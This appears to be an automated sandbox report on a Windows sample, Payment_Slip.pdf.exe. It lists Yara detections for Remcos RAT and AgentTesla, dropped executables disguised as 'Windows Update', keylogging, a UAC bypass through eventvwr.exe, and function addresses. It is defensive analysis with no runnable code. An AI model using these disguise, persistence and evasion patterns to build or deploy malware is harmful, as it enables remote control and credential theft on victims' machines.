Source: C:\Users\user\AppData\Local\Temp\conserver.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window created: window name: CLIPBRDWNDCLASS
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3D1C0 GetKeyState,GetKeyState,GetKeyState, 12_2_06C3D1C0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3D1D0 GetKeyState,GetKeyState,GetKeyState, 12_2_06C3D1D0

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A76C SystemParametersInfoW, 11_2_0041A76C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041A76C SystemParametersInfoW, 17_2_0041A76C

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Payment_Slip.pdf.exe
Source: initial sample Static PE information: Filename: Payment_Slip.pdf.exe
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00401806 NtdllDefWindowProc_W, 14_2_00401806
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004018C0 NtdllDefWindowProc_W, 14_2_004018C0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004016FC NtdllDefWindowProc_A, 15_2_004016FC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004017B6 NtdllDefWindowProc_A, 15_2_004017B6
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00402CAC NtdllDefWindowProc_A, 16_2_00402CAC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00402D66 NtdllDefWindowProc_A, 16_2_00402D66
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 11_2_00414DB4
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 17_2_00414DB4
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_00A34210 0_2_00A34210
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_00A3E1AC 0_2_00A3E1AC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_00A36F90 0_2_00A36F90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_09617D50 0_2_09617D50
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_09619308 0_2_09619308
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_096139C8 0_2_096139C8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_09611D50 0_2_09611D50
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_09612188 0_2_09612188
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_09614378 0_2_09614378
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 0_2_096125C0 0_2_096125C0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_02F34210 7_2_02F34210
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_02F3E1AC 7_2_02F3E1AC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_02F36F90 7_2_02F36F90
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D6EE0 7_2_076D6EE0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D8498 7_2_076D8498
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D1D50 7_2_076D1D50
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D25C0 7_2_076D25C0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D4378 7_2_076D4378
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D39C8 7_2_076D39C8
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 7_2_076D2188 7_2_076D2188
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00425152 11_2_00425152
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00435286 11_2_00435286
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004513D4 11_2_004513D4
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0045050B 11_2_0045050B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00436510 11_2_00436510
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004316FB 11_2_004316FB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0043569E 11_2_0043569E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00443700 11_2_00443700
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004257FB 11_2_004257FB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004128E3 11_2_004128E3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00425964 11_2_00425964
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041B917 11_2_0041B917
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0043D9CC 11_2_0043D9CC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00435AD3 11_2_00435AD3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00424BC3 11_2_00424BC3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0043DBFB 11_2_0043DBFB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0044ABA9 11_2_0044ABA9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00433C0B 11_2_00433C0B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00434D8A 11_2_00434D8A
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0043DE2A 11_2_0043DE2A
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041CEAF 11_2_0041CEAF
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00435F08 11_2_00435F08
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3170 12_2_007D3170
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D316B 12_2_007D316B
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C94228 12_2_00C94228
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C94570 12_2_00C94570
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C94E40 12_2_00C94E40
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C9930C 12_2_00C9930C
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C9AA80 12_2_00C9AA80
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C9AA71 12_2_00C9AA71
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C9931D 12_2_00C9931D
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_00C9B770 12_2_00C9B770
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_067F6C63 12_2_067F6C63
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_067FC961 12_2_067FC961
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_0683B740 12_2_0683B740
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_0683C418 12_2_0683C418
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_068353B0 12_2_068353B0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_0683D8E0 12_2_0683D8E0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_0683D00B 12_2_0683D00B
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_0683F1F8 12_2_0683F1F8
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_068322F8 12_2_068322F8
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3245B 12_2_06C3245B
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C33428 12_2_06C33428
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C37AC3 12_2_06C37AC3
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C359F0 12_2_06C359F0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_02E3A1A0 13_2_02E3A1A0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_02E39588 13_2_02E39588
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_02E398D0 13_2_02E398D0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_05B22DA0 13_2_05B22DA0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_05B233D8 13_2_05B233D8
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_05B23B10 13_2_05B23B10
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682F200 13_2_0682F200
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06820713 13_2_06820713
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682C4E0 13_2_0682C4E0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06826510 13_2_06826510
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682C393 13_2_0682C393
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06827773 13_2_06827773
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06827778 13_2_06827778
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682D378 13_2_0682D378
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9D690 13_2_06A9D690
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A93668 13_2_06A93668
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9E648 13_2_06A9E648
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A970E8 13_2_06A970E8
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9B184 13_2_06A9B184
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9E620 13_2_06A9E620
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A90B90 13_2_06A90B90
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9F330 13_2_06A9F330
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9D1E2 13_2_06A9D1E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044B040 14_2_0044B040
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0043610D 14_2_0043610D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00447310 14_2_00447310
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044A490 14_2_0044A490
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040755A 14_2_0040755A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0043C560 14_2_0043C560
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044B610 14_2_0044B610
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044D6C0 14_2_0044D6C0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004476F0 14_2_004476F0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044B870 14_2_0044B870
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044081D 14_2_0044081D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00414957 14_2_00414957
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004079EE 14_2_004079EE
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00407AEB 14_2_00407AEB
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044AA80 14_2_0044AA80
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00412AA9 14_2_00412AA9
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00404B74 14_2_00404B74
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00404B03 14_2_00404B03
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044BBD8 14_2_0044BBD8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00404BE5 14_2_00404BE5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00404C76 14_2_00404C76
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00415CFE 14_2_00415CFE
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00416D72 14_2_00416D72
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00446D30 14_2_00446D30
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00446D8B 14_2_00446D8B
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00406E8F 14_2_00406E8F
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_0040D044 15_2_0040D044
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00405038 15_2_00405038
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004050A9 15_2_004050A9
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_0040511A 15_2_0040511A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004051AB 15_2_004051AB
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004382F3 15_2_004382F3
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00430575 15_2_00430575
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_0043B671 15_2_0043B671
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_0041F6CD 15_2_0041F6CD
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004119CF 15_2_004119CF
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00439B11 15_2_00439B11
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00438E54 15_2_00438E54
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00412F67 15_2_00412F67
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_0043CF18 15_2_0043CF18
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004050C2 16_2_004050C2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004014AB 16_2_004014AB
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00405133 16_2_00405133
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004051A4 16_2_004051A4
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00401246 16_2_00401246
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_0040CA46 16_2_0040CA46
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00405235 16_2_00405235
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004032C8 16_2_004032C8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00401689 16_2_00401689
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00402F60 16_2_00402F60
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00425152 17_2_00425152
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00435286 17_2_00435286
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004513D4 17_2_004513D4
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0045050B 17_2_0045050B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00436510 17_2_00436510
